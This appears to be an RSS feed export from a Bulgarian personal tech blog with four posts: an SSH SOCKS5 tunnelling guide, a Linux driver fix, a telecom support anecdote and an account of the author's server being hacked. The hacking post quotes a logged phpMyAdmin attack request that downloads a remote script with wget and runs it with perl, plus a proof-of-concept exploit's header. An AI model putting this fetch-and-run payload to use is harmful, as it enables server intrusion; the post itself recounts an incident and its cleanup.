<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Lucifer&#039;s sandbox &#187; geek time</title>
	<atom:link href="http://www.anavaro.com/blog/tag/geek-time/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.anavaro.com/blog</link>
	<description>Where the devil plays</description>
	<lastBuildDate>Sun, 18 Jul 2010 10:09:48 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>SOCKS 5 + PuTTY + SSH или лесен псевдо VPN(GeekTime)</title>
		<link>http://www.anavaro.com/blog/socks5-putty-ssh-easy-vpn/</link>
		<comments>http://www.anavaro.com/blog/socks5-putty-ssh-easy-vpn/#comments</comments>
		<pubDate>Thu, 22 Apr 2010 09:47:33 +0000</pubDate>
		<dc:creator>Lucifer</dc:creator>
				<category><![CDATA[HowTo]]></category>
		<category><![CDATA[geek time]]></category>
		<category><![CDATA[chrome]]></category>
		<category><![CDATA[firefox]]></category>
		<category><![CDATA[putty]]></category>
		<category><![CDATA[socks 5]]></category>
		<category><![CDATA[vpn]]></category>

		<guid isPermaLink="false">http://www.anavaro.com/blog/?p=609</guid>
		<description><![CDATA[Днес сутринта на работа реших, че ми трябва достъп до сайт &#8230; който не е добре да разбират от работа, че гледам и реших да се заинтересувам от възможноста за създаване на някакво псевдо proxy и попаднах на този супер лесен начин. Какво ви трябва? PuTTY SSH Shell някъде Хубав browser (Firefox/Chrome/Opera) Каква е целта? [...]]]></description>
			<content:encoded><![CDATA[
<p>Днес сутринта на работа реших, че ми трябва достъп до сайт &#8230; който не е добре да разбират от работа, че гледам и реших да се заинтересувам от възможноста за създаване на някакво псевдо proxy и попаднах на този супер лесен начин.</p>
<p>Какво ви трябва?</p>
<p>PuTTY</p>
<p>SSH Shell някъде</p>
<p>Хубав browser (Firefox/Chrome/Opera)</p>
<p><br class="spacer_" /></p>
<p>Каква е целта?</p>
<p>Използвайки една малко известна функция на SSH създаваме връзка с shell-а, който може да е на всякъде (в моя случай &#8211; www.anavaro.com). После пренасочваме трафика през връзката и получаваме своебразен лесен VPN.</p>
<p><br class="spacer_" /></p>
<p>Как става?</p>
<p>Пускате PuTTY.</p>
<p>Задавате адрес за SSH сесията.</p>
<p>Отивате на Connections -&gt; SSH -&gt; Tunels.</p>
<p>Задавате Source port (в моя случай 8888)</p>
<p>Слагате отметките под Destination на Dynamic и Auto и давате Add</p>
<p>Свързвате се с shell-а, пишете си user-а и паролата</p>
<p>И вече имате тунел през който да пренасочите трафика си.</p>
<p>Сега тънката част &#8211; Browser-а</p>
<p>Тук ще спомена, че по принцип всеки Browser може да се използва, всеки който има възможности да ползва proxy. Защо споменах горните 3 ще разберете по-късно.</p>
<p>За Firefox:</p>
<p>Tools -&gt; Options -&gt; Advanced -&gt; Network -&gt; Settings</p>
<p>Там избирате Manual Proxy Configuration и в SOCKS Host слагате 127.0.0.1, а за порт &#8211; порта който сте си избрали по рано.</p>
<p>От тук на сетне целия трафик ще минава през отворената с PuTTY сесия &#8230;</p>
<p>Тук идва въпроса &#8211; АМИ DNS ЗАЯВКИТЕ? Защото той трафика си минава през secure връзката, но сайтовете се резолвват през DNS.</p>
<p>В адресната линия пишете &#8220;about:config&#8221;. Намирате си опцията &#8220;etwork.proxy.socks_remote_dns&#8221; и я правите на TRUE et voila &#8230;</p>
<p>За Chrome:</p>
<p>Отново като за Firefox сменяте proxy-то, но слагането на secure DNS е малко по-сложно:</p>
<p>1. Добавяте към shortcut-а на Chrome</p>
<pre>--proxy-server=socks5://127.0.0.1:8888</pre>
<p>2. от настройките отивате на Under the hood и махате опцията &#8220;Use DNS pre-fetching to improve page load performance&#8221;</p>
<p>и готово! Имате си secure връзка.</p>
<p>А какво правите, ако сте като мен &#8211; под Linux?</p>
<p>Дори още по-лесно:</p>
<p>В някоя конзола пускате следния ред:</p>
<pre>$ ssh -D 8888 user@host</pre>
<p>И правите същите настройки на browser-а като за Windows &#8230;</p>
<p>Това SOCKS5 Proxy може да използвате и с повеето чат клиенти, за да си прекарате връзката през него (Skype и Koppete знам със сигурност, че имат proxy options)</p>
<p>Надявам се това да ви е помогнало!</p>
<p>Ваш,</p>
<p>Lucifer</p>
<div class="topsy_widget_data topsy_theme_jade" style="float: left;margin-left: 0.75em; background: url(data:,%7B%20%22url%22%3A%20%22http%253A%252F%252Fwww.anavaro.com%252Fblog%252Fsocks5-putty-ssh-easy-vpn%252F%22%2C%20%22shorturl%22%3A%20%22http%3A%2F%2Fbit.ly%2Fb5McKe%22%2C%20%22style%22%3A%20%22small%22%2C%20%22title%22%3A%20%22SOCKS%205%20%2B%20PuTTY%20%2B%20SSH%20%D0%B8%D0%BB%D0%B8%20%D0%BB%D0%B5%D1%81%D0%B5%D0%BD%20%D0%BF%D1%81%D0%B5%D0%B2%D0%B4%D0%BE%20VPN%28GeekTime%29%22%20%7D);"></div>

<p><a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fwww.anavaro.com%2Fblog%2Fsocks5-putty-ssh-easy-vpn%2F&amp;linkname=SOCKS%205%20%2B%20PuTTY%20%2B%20SSH%20%D0%B8%D0%BB%D0%B8%20%D0%BB%D0%B5%D1%81%D0%B5%D0%BD%20%D0%BF%D1%81%D0%B5%D0%B2%D0%B4%D0%BE%20VPN%28GeekTime%29" title="Twitter" rel="nofollow" target="_blank"><img src="http://www.anavaro.com/blog/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fwww.anavaro.com%2Fblog%2Fsocks5-putty-ssh-easy-vpn%2F&amp;linkname=SOCKS%205%20%2B%20PuTTY%20%2B%20SSH%20%D0%B8%D0%BB%D0%B8%20%D0%BB%D0%B5%D1%81%D0%B5%D0%BD%20%D0%BF%D1%81%D0%B5%D0%B2%D0%B4%D0%BE%20VPN%28GeekTime%29" title="Facebook" rel="nofollow" target="_blank"><img src="http://www.anavaro.com/blog/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/svejo?linkurl=http%3A%2F%2Fwww.anavaro.com%2Fblog%2Fsocks5-putty-ssh-easy-vpn%2F&amp;linkname=SOCKS%205%20%2B%20PuTTY%20%2B%20SSH%20%D0%B8%D0%BB%D0%B8%20%D0%BB%D0%B5%D1%81%D0%B5%D0%BD%20%D0%BF%D1%81%D0%B5%D0%B2%D0%B4%D0%BE%20VPN%28GeekTime%29" title="Svejo" rel="nofollow" target="_blank"><img src="http://www.anavaro.com/blog/wp-content/plugins/add-to-any/icons/svejo.png" width="16" height="16" alt="Svejo"/></a> <a href="http://www.addtoany.com/add_to/google_reader?linkurl=http%3A%2F%2Fwww.anavaro.com%2Fblog%2Fsocks5-putty-ssh-easy-vpn%2F&amp;linkname=SOCKS%205%20%2B%20PuTTY%20%2B%20SSH%20%D0%B8%D0%BB%D0%B8%20%D0%BB%D0%B5%D1%81%D0%B5%D0%BD%20%D0%BF%D1%81%D0%B5%D0%B2%D0%B4%D0%BE%20VPN%28GeekTime%29" title="Google Reader" rel="nofollow" target="_blank"><img src="http://www.anavaro.com/blog/wp-content/plugins/add-to-any/icons/reader.png" width="16" height="16" alt="Google Reader"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save">Сподели</a> </p>]]></content:encoded>
			<wfw:commentRss>http://www.anavaro.com/blog/socks5-putty-ssh-easy-vpn/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Kernel 2.6.32.x и ATI Catalyst (GeekTime)</title>
		<link>http://www.anavaro.com/blog/kernel-2-6-32-x-ati-catalyst/</link>
		<comments>http://www.anavaro.com/blog/kernel-2-6-32-x-ati-catalyst/#comments</comments>
		<pubDate>Mon, 11 Jan 2010 17:35:22 +0000</pubDate>
		<dc:creator>Lucifer</dc:creator>
				<category><![CDATA[HowTo]]></category>
		<category><![CDATA[geek time]]></category>
		<category><![CDATA[2.6.32.3]]></category>
		<category><![CDATA[ati catalyst]]></category>
		<category><![CDATA[drivers]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[slackware]]></category>
		<category><![CDATA[драйвери]]></category>
		<category><![CDATA[кернел]]></category>
		<category><![CDATA[линукс]]></category>

		<guid isPermaLink="false">http://www.anavaro.com/blog/?p=528</guid>
		<description><![CDATA[Нали ме знаете, че съм си гаден geek, та винаги гледам да съм с последните версии на каквото е излязло &#8230; дори с последни версии на ядрото на Slackware-а с който работя в къщи. Kernel-а който излезе на 9-ти беше 2.6.32.3 и разбира се първата ми работа беше да го инсталирам, да го прекомплирам за [...]]]></description>
			<content:encoded><![CDATA[
<p>Нали ме знаете, че съм си гаден geek, та винаги гледам да съм с последните версии на каквото е излязло &#8230; дори с последни версии на ядрото на Slackware-а с който работя в къщи.</p>
<p>Kernel-а който излезе на 9-ти беше 2.6.32.3 и разбира се първата ми работа беше да го инсталирам, да го прекомплирам за да открива и 4-те GB RAM и да си направя initrd.gz за да мога да си пускам машината (аз съм гаден параноик и съм я криптирал)  &#8230;</p>
<p>Всичко мина добре. Влязох като root и махнах стария fglrx.9.12 компилиран за 2.6.29.6.</p>
<p>Стартирах инсталатора &#8230; и каква беше изненадата ми, когато вместо &#8220;Instalation complete&#8221;, получих съобщението &#8220;There were errors compiling driver. Please refer to fglrx-install.log&#8221;</p>
<p>WTF??? Какви грешки бе!</p>
<p>nano /usr/share/ati/fglrx-install.log</p>
<pre>[Message] Kernel Module : Trying to install a precompiled kernel module.
[Message] Kernel Module : Precompiled kernel module version mismatched.
[Message] Kernel Module : Found kernel module build environment, generating kernel module now.
AMD kernel module generator version 2.1
doing Makefile based build for kernel 2.6.x and higher
rm -rf *.c *.h *.o *.ko *.GCC* .??* *.symvers
make -C /lib/modules/2.6.32.3-smp/build SUBDIRS=/lib/modules/fglrx/build_mod/2.6.x modules
make[1]: Entering directory `/usr/src/linux-2.6.32.3'
CC [M]  /lib/modules/fglrx/build_mod/2.6.x/firegl_public.o
In file included from /lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:443:
/lib/modules/fglrx/build_mod/2.6.x/drm_proc.h: In function ‘FGLDRM__vma_info’:
/lib/modules/fglrx/build_mod/2.6.x/drm_proc.h:497: warning: format ‘%08lx’ expects type ‘long unsigned int’, but argument 5 has type ‘phys_addr_t’
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c: In function ‘KCL_MapPageToPfn’:
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:1586: warning: unused variable ‘bus_addr’
CC [M]  /lib/modules/fglrx/build_mod/2.6.x/kcl_acpi.o
CC [M]  /lib/modules/fglrx/build_mod/2.6.x/kcl_agp.o
CC [M]  /lib/modules/fglrx/build_mod/2.6.x/kcl_debug.o
CC [M]  /lib/modules/fglrx/build_mod/2.6.x/kcl_ioctl.o
CC [M]  /lib/modules/fglrx/build_mod/2.6.x/kcl_io.o
/lib/modules/fglrx/build_mod/2.6.x/kcl_io.c: In function ‘KCL_IO_FASYNC_Terminate’:
/lib/modules/fglrx/build_mod/2.6.x/kcl_io.c:122: error: ‘SIGIO’ undeclared (first use in this function)
/lib/modules/fglrx/build_mod/2.6.x/kcl_io.c:122: error: (Each undeclared identifier is reported only once
/lib/modules/fglrx/build_mod/2.6.x/kcl_io.c:122: error: for each function it appears in.)
make[2]: *** [/lib/modules/fglrx/build_mod/2.6.x/kcl_io.o] Error 1
make[1]: *** [_module_/lib/modules/fglrx/build_mod/2.6.x] Error 2
make[1]: Leaving directory `/usr/src/linux-2.6.32.3'
make: *** [kmod_build] Error 2
build failed with return value 2
[Error] Kernel Module : Failed to compile kernel module - please consult readme.
</pre>
<p>Какво по &#8230;</p>
<p>И отново старото ровене в чичо google &#8230; 2 дни без хубаво видео &#8230; няма да ви описвам мъките си &#8230; докато на някакъв забит пост в някакъв забит форум не намерих как да го оправя &#8230; а то се оказа и много просто &#8211; явно в новата ядро са отделили част от нещата в нов header file &#8230;</p>
<p>Ето и решението step-by-step:</p>
<p>01. Сваляте си драйверите от сайта на ATI.<br />
 02. Стартирате run-а с опция &#8211;extract<br />
 03. Отваряте fglrx-install.nqkakuv_string/common/lib/modules/fglrx/build_mod/kcl_io.c където добавяте:</p>
<p>#include &lt;linux/signal.h&gt;</p>
<p>04. В fglrx-install.nqkakuv-string стартирате sh ./ati-installer.sh 8.5912 &#8211;install<br />
 05. reboot &#8230; and that is all &#8230;</p>
<p>Лесно нали? Някъде из нет-а се мотат готови .patch, но нямах време и желание да търся &#8230; за това използвах nano &#8230; и го направих на ръка &#8230; лесно и бързо &#8230; веднъж като знаеш какво ти трябва &#8230;</p>
<p>Надвявам, се да помогна на някого.</p>
<p><br class="spacer_" /></p>
<p>Ваш,</p>
<p>Lucifer</p>
<div class="topsy_widget_data topsy_theme_jade" style="float: left;margin-left: 0.75em; background: url(data:,%7B%20%22url%22%3A%20%22http%253A%252F%252Fwww.anavaro.com%252Fblog%252Fkernel-2-6-32-x-ati-catalyst%252F%22%2C%20%22style%22%3A%20%22small%22%2C%20%22title%22%3A%20%22Kernel%202.6.32.x%20%D0%B8%20ATI%20Catalyst%20%28GeekTime%29%22%20%7D);"></div>

<p><a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fwww.anavaro.com%2Fblog%2Fkernel-2-6-32-x-ati-catalyst%2F&amp;linkname=Kernel%202.6.32.x%20%D0%B8%20ATI%20Catalyst%20%28GeekTime%29" title="Twitter" rel="nofollow" target="_blank"><img src="http://www.anavaro.com/blog/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fwww.anavaro.com%2Fblog%2Fkernel-2-6-32-x-ati-catalyst%2F&amp;linkname=Kernel%202.6.32.x%20%D0%B8%20ATI%20Catalyst%20%28GeekTime%29" title="Facebook" rel="nofollow" target="_blank"><img src="http://www.anavaro.com/blog/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/svejo?linkurl=http%3A%2F%2Fwww.anavaro.com%2Fblog%2Fkernel-2-6-32-x-ati-catalyst%2F&amp;linkname=Kernel%202.6.32.x%20%D0%B8%20ATI%20Catalyst%20%28GeekTime%29" title="Svejo" rel="nofollow" target="_blank"><img src="http://www.anavaro.com/blog/wp-content/plugins/add-to-any/icons/svejo.png" width="16" height="16" alt="Svejo"/></a> <a href="http://www.addtoany.com/add_to/google_reader?linkurl=http%3A%2F%2Fwww.anavaro.com%2Fblog%2Fkernel-2-6-32-x-ati-catalyst%2F&amp;linkname=Kernel%202.6.32.x%20%D0%B8%20ATI%20Catalyst%20%28GeekTime%29" title="Google Reader" rel="nofollow" target="_blank"><img src="http://www.anavaro.com/blog/wp-content/plugins/add-to-any/icons/reader.png" width="16" height="16" alt="Google Reader"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save">Сподели</a> </p>]]></content:encoded>
			<wfw:commentRss>http://www.anavaro.com/blog/kernel-2-6-32-x-ati-catalyst/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Vivacom &#8230; малко забава &#8230;</title>
		<link>http://www.anavaro.com/blog/vivacom-malko-zabava/</link>
		<comments>http://www.anavaro.com/blog/vivacom-malko-zabava/#comments</comments>
		<pubDate>Sat, 26 Dec 2009 19:14:08 +0000</pubDate>
		<dc:creator>Lucifer</dc:creator>
				<category><![CDATA[fun]]></category>
		<category><![CDATA[geek time]]></category>
		<category><![CDATA[misk]]></category>
		<category><![CDATA[joke]]></category>
		<category><![CDATA[mail2sms]]></category>
		<category><![CDATA[support]]></category>
		<category><![CDATA[vivakom]]></category>
		<category><![CDATA[виваком]]></category>
		<category><![CDATA[поддръжка]]></category>

		<guid isPermaLink="false">http://www.anavaro.com/blog/?p=516</guid>
		<description><![CDATA[Седя си аз и си обмислям поредния проект, много важна част от който е изпращането на e-mail към SMS и който ще публикувам като го завърша &#8230; та решавам аз да видя дали Жижакомци (как звучи обаче) поддържат mail2sms &#8230; Звъня аз на оператор &#8230; Операторката: Виваком. Говорите с &#8230; АЗ(след 5 минути on hold): [...]]]></description>
			<content:encoded><![CDATA[
<p>Седя си аз и си обмислям поредния проект, много важна част от който е изпращането на e-mail към SMS и който ще публикувам като го завърша &#8230; та решавам аз да видя дали Жижакомци (как звучи обаче) поддържат mail2sms &#8230;</p>
<p><br class="spacer_" /></p>
<p>Звъня аз на оператор &#8230;</p>
<p>Операторката: Виваком. Говорите с &#8230;</p>
<p>АЗ(след 5 минути on hold): Добър вечер. Имам глупав въпрос. Случайно да поддържате e-mail към SMS услигата?</p>
<p>Девойката: Аааа. &#8230; не знам &#8230; изчакайте за момент на линия да попитам.</p>
<p>(пратен съм пак on hold)</p>
<p>Девойката: Не господине, не предлагаме тази услуга.</p>
<p>АЗ: Добре, а има ли някакъв начин да пращам SMS от интернет?</p>
<p>Девойката: Да, господине &#8230; от сайта на Виваком.</p>
<p>АЗ: А има ли някакво API или нещо което да автоматизира процеса?</p>
<p>Девойката: Моля? Не ви разбрах?</p>
<p>(Свикнал съм да не ме разбират)</p>
<p>АЗ: Добре. Няма значение, благодаря ви.</p>
<p>***</p>
<p>Тази ситуация, както се досещате никак не ми харесва &#8230; ама никак! Та решавам въпреки това да пробвам.</p>
<p>Преравям интернета и виждам как са дефинирани адресите на другите 2 Български мобилни оператора &#8230;</p>
<p>Логвам се в мейл-а си.</p>
<p>359878хххххх[at]sms.vivacom.bg</p>
<p>Пращам &#8230;</p>
<p>Звънн на GSM-а -&gt; ИМАТЕ SMS от &#8230;</p>
<p>DEAMN YOU!!!</p>
<p>Звъня пак на оператор &#8230;</p>
<p>***</p>
<p>Девойката: Свързахте се с Виваком. Говорите с &#8230;</p>
<p>АЗ: Добър вечер. Я да ви питам &#8211; заплащам ли SMS-ите, които получавам от mail2sms gatway-а ви?</p>
<p>Девойката: А? Не ви разбрах?</p>
<p>АЗ: Заплащам ли SMS-ите които получавам от електронната си поща?</p>
<p>Девойката: Имате предвид новата ни услуга Nokia Messeging ли?</p>
<p>АЗ: Не. Нямам предвид push mail услугата ви&#8230; Имам предвид mail2sms gateway-a &#8230; Няма значение &#8230; Бихте ли ми казали дали заплащам SMS-те пристигащи от номер &#8230;</p>
<p>Девойката: Сега ще проверя, господине &#8230;</p>
<p>(On hold за 20 минути)</p>
<p>Девойката: Съжалявам за забавянето, но &#8230;</p>
<p>АЗ: &#8230; ви хвърлих в Jazz-a?</p>
<p>Девойката: Да. До колкото разбрах не предлагаме такава услуга &#8230;</p>
<p>АЗ: От мене да знаете, че предлагате &#8230; Въпроса е дали си плащам.</p>
<p>Девойката: Не знам, господине &#8230;</p>
<p>АЗ: Добре &#8230; имате достъп до таксуванията на номера ми, нали?</p>
<p>Девойката: Да?</p>
<p>АЗ: Отворете ги.</p>
<p>Девойката: Дайте си номера &#8230;</p>
<p>АЗ: 0878хххххх</p>
<p>Девойката: Но те се опресняват на 3 часа, господине &#8230; Последното ви е от 11:10 &#8230; ползване на интернет.</p>
<p>АЗ: Добре &#8230; показва ли се кога съм говорил с оператор?</p>
<p>Девойката: Да, господине. Провели сте разговор в 19:35 &#8230;</p>
<p>АЗ: След това не съм таксуван, нали?</p>
<p>Девойката: Не, господине.</p>
<p>АЗ: Добре, значи системата ви се е опреснила &#8230; щом е отчела обаждането на оператор и след него не съм таксуван, следователно не ме таксувате за тези SMS-и &#8230;</p>
<p>Девойката: Логиката ви е безупречна господине &#8230; но отново ви казвам, че не предлагаме такава услуга &#8230;</p>
<p>АЗ: А от мен  да знаете &#8230; че всъщност предлагате &#8230; Благодаря ви и лека вечер!</p>
<p>***</p>
<p>Много се забавлявам понякога в Вивакомци &#8230; Много са ми забавни &#8230; Поддръжката им явно има някакъв минимален запас от познания и им е трудно да импровизират върху тях &#8230;</p>
<p><br class="spacer_" /></p>
<p>Ваш,</p>
<p>Lucifer</p>
<div class="topsy_widget_data topsy_theme_jade" style="float: left;margin-left: 0.75em; background: url(data:,%7B%20%22url%22%3A%20%22http%253A%252F%252Fwww.anavaro.com%252Fblog%252Fvivacom-malko-zabava%252F%22%2C%20%22style%22%3A%20%22small%22%2C%20%22title%22%3A%20%22Vivacom%20...%20%D0%BC%D0%B0%D0%BB%D0%BA%D0%BE%20%D0%B7%D0%B0%D0%B1%D0%B0%D0%B2%D0%B0%20...%22%20%7D);"></div>

<p><a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fwww.anavaro.com%2Fblog%2Fvivacom-malko-zabava%2F&amp;linkname=Vivacom%20%26%238230%3B%20%D0%BC%D0%B0%D0%BB%D0%BA%D0%BE%20%D0%B7%D0%B0%D0%B1%D0%B0%D0%B2%D0%B0%20%26%238230%3B" title="Twitter" rel="nofollow" target="_blank"><img src="http://www.anavaro.com/blog/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fwww.anavaro.com%2Fblog%2Fvivacom-malko-zabava%2F&amp;linkname=Vivacom%20%26%238230%3B%20%D0%BC%D0%B0%D0%BB%D0%BA%D0%BE%20%D0%B7%D0%B0%D0%B1%D0%B0%D0%B2%D0%B0%20%26%238230%3B" title="Facebook" rel="nofollow" target="_blank"><img src="http://www.anavaro.com/blog/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/svejo?linkurl=http%3A%2F%2Fwww.anavaro.com%2Fblog%2Fvivacom-malko-zabava%2F&amp;linkname=Vivacom%20%26%238230%3B%20%D0%BC%D0%B0%D0%BB%D0%BA%D0%BE%20%D0%B7%D0%B0%D0%B1%D0%B0%D0%B2%D0%B0%20%26%238230%3B" title="Svejo" rel="nofollow" target="_blank"><img src="http://www.anavaro.com/blog/wp-content/plugins/add-to-any/icons/svejo.png" width="16" height="16" alt="Svejo"/></a> <a href="http://www.addtoany.com/add_to/google_reader?linkurl=http%3A%2F%2Fwww.anavaro.com%2Fblog%2Fvivacom-malko-zabava%2F&amp;linkname=Vivacom%20%26%238230%3B%20%D0%BC%D0%B0%D0%BB%D0%BA%D0%BE%20%D0%B7%D0%B0%D0%B1%D0%B0%D0%B2%D0%B0%20%26%238230%3B" title="Google Reader" rel="nofollow" target="_blank"><img src="http://www.anavaro.com/blog/wp-content/plugins/add-to-any/icons/reader.png" width="16" height="16" alt="Google Reader"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save">Сподели</a> </p>]]></content:encoded>
			<wfw:commentRss>http://www.anavaro.com/blog/vivacom-malko-zabava/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Hacked &#8230;</title>
		<link>http://www.anavaro.com/blog/hacked/</link>
		<comments>http://www.anavaro.com/blog/hacked/#comments</comments>
		<pubDate>Thu, 03 Dec 2009 01:40:36 +0000</pubDate>
		<dc:creator>Lucifer</dc:creator>
				<category><![CDATA[blog]]></category>
		<category><![CDATA[geek time]]></category>
		<category><![CDATA[misk]]></category>
		<category><![CDATA[cron]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[phpMyAdmin]]></category>
		<category><![CDATA[server]]></category>
		<category><![CDATA[std]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[блог]]></category>
		<category><![CDATA[вирус]]></category>
		<category><![CDATA[линукс]]></category>
		<category><![CDATA[сървър]]></category>

		<guid isPermaLink="false">http://www.anavaro.com/blog/?p=468</guid>
		<description><![CDATA[Искам да се оплача &#8230; от собствената си глупост &#8230; и то много да се оплача &#8230; То бива бива да съм заблуден, ама като мене не бива. Ситуацията на кратко &#8211; сървъра ми беше хакнат! Дап, моето мило Анаваро! Беше заразен с IRC бот вирус. Нямаше много &#8220;мрежеви&#8221; поражения &#8230; защото машината слаба или [...]]]></description>
			<content:encoded><![CDATA[
<p>Искам да се оплача &#8230; от собствената си глупост &#8230; и то много да се оплача &#8230;</p>
<p>То бива бива да съм заблуден, ама като мене не бива. Ситуацията на кратко &#8211; сървъра ми беше хакнат! Дап, моето мило Анаваро!</p>
<p>Беше заразен с IRC бот вирус. Нямаше много &#8220;мрежеви&#8221; поражения &#8230; защото машината слаба или аз съм я сложил калпаво, та вируса само се изпълняваше, вдигаше CPU-то на 100% и системата умираше &#8211; няма мрежа, няма нищо, а аз знаете съм на 500 км.</p>
<p>След няколко рестарт-а и любимите ми &#8220;<span style="font-family: terminal,monaco;">tail -f</span>&#8221; и &#8220;<span style="font-family: terminal,monaco;">htop</span>&#8221; успях да засека следния малък проблем:</p>
<pre style="margin-top: 0pt; display: inline;">ID    USER    NI  CPU%  MEM%   VIRT    SHR   S  TIME+     Command
3813  apache  0   65.0    0.1       1776   432    R   1:42.64   ./std 89.137.139.225 0</pre>
<p>А &#8230; ново 20??? Какъв пък процес се изпълнява от apache (Web Server-a) &#8230;</p>
<p>Спомних си кога за първи път се появи проблема и се зарових из логовете на индианеца &#8230; където открих следния &#8220;смахнат&#8221; ред:</p>
<pre>88.191.14.38 - - [29/Nov/2009:02:12:10 +0200] "GET /phpMyAdmin/config/config.inc.php?c=cd%20/tmp;wget%20http://88.170.72.136/gcc.txt;lwp-download%20http://88.170.72.136/gcc.txt;fetch%20http://88.170.72.136/gcc.txt;perl%20gcc.txt;rm%20-fr%20gcc.txt HTTP/1.1" 200 181</pre>
<p>Изненадкааа &#8230;Разбира се разпищях се из Linux-bg и ми върнаха лошата за мен новина:</p>
<blockquote><address># PoC script successfully tested on the following targets:</address>
<address># phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1</address>
<address># Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)</address>
<address>
# attack requirements:</address>
<address># 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5</address>
<address># and 3.x before 3.1.3.1 according to PMASA-2009-3</address>
<address># 2) it *seems* this vuln can only be exploited against environments</address>
<address># where the administrator has chosen to install phpMyAdmin following</address>
<address># the *wizard* method, rather than manual method: <a href="http://snipurl.com/jhjxx" target="_blank">http://snipurl.com/jhjxx</a></address>
<address><strong># 3) administrator must have NOT deleted the &#8216;/config/&#8217; directory<br />
# within the &#8216;/phpMyAdmin/&#8217; directory. this is because this directory is<br />
# where &#8216;/scripts/setup.php&#8217; tries to create &#8216;config.inc.php&#8217; which is where<br />
# our evil PHP code is injected <img title="Cool" src="http://www.linux-bg.org/forum/Smileys/default/cool.gif" border="0" alt="8)" /></strong></address>
</blockquote>
<p>Бах! Как се саморазпосувах, само може да си представите! Правих какви ли не магарии &#8211; то не бяха преинсталации на apache, промени на пътеки &#8230;</p>
<p>Отново и отново ./std $IP $PORT процеса ме убиваше &#8230;</p>
<p>Питайки чичко Гугъл &#8230; случайно стигнах до един сайт в който някой се оплакваше от моя проблем.</p>
<pre>ps aux | grep apache</pre>
<p>ми даде виновника &#8211; индианеца се беше троянизирал &#8230; изпълняваше процеси (добре че е deamon) &#8230;</p>
<pre>crontab -u apache -e</pre>
<p>ми даде и проблема &#8211; някакво фаилче кръстено y2kupdate в /tmp/.pid/ и изпълнимо &#8230; на бързо му бих &#8220;rm -r&#8221;, премахнах референцията в cron-а и изтрих phpMyAdmin-a (сложих си го на скрито място) &#8230;</p>
<p>Знам, че съм пълен идиот &#8230; ама аз съм си такъв &#8230;</p>
<p>Ваш,</p>
<p>Lucifer</p>
<div class="topsy_widget_data topsy_theme_jade" style="float: left;margin-left: 0.75em; background: url(data:,%7B%20%22url%22%3A%20%22http%253A%252F%252Fwww.anavaro.com%252Fblog%252Fhacked%252F%22%2C%20%22style%22%3A%20%22small%22%2C%20%22title%22%3A%20%22Hacked%20...%22%20%7D);"></div>

<p><a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fwww.anavaro.com%2Fblog%2Fhacked%2F&amp;linkname=Hacked%20%26%238230%3B" title="Twitter" rel="nofollow" target="_blank"><img src="http://www.anavaro.com/blog/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fwww.anavaro.com%2Fblog%2Fhacked%2F&amp;linkname=Hacked%20%26%238230%3B" title="Facebook" rel="nofollow" target="_blank"><img src="http://www.anavaro.com/blog/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/svejo?linkurl=http%3A%2F%2Fwww.anavaro.com%2Fblog%2Fhacked%2F&amp;linkname=Hacked%20%26%238230%3B" title="Svejo" rel="nofollow" target="_blank"><img src="http://www.anavaro.com/blog/wp-content/plugins/add-to-any/icons/svejo.png" width="16" height="16" alt="Svejo"/></a> <a 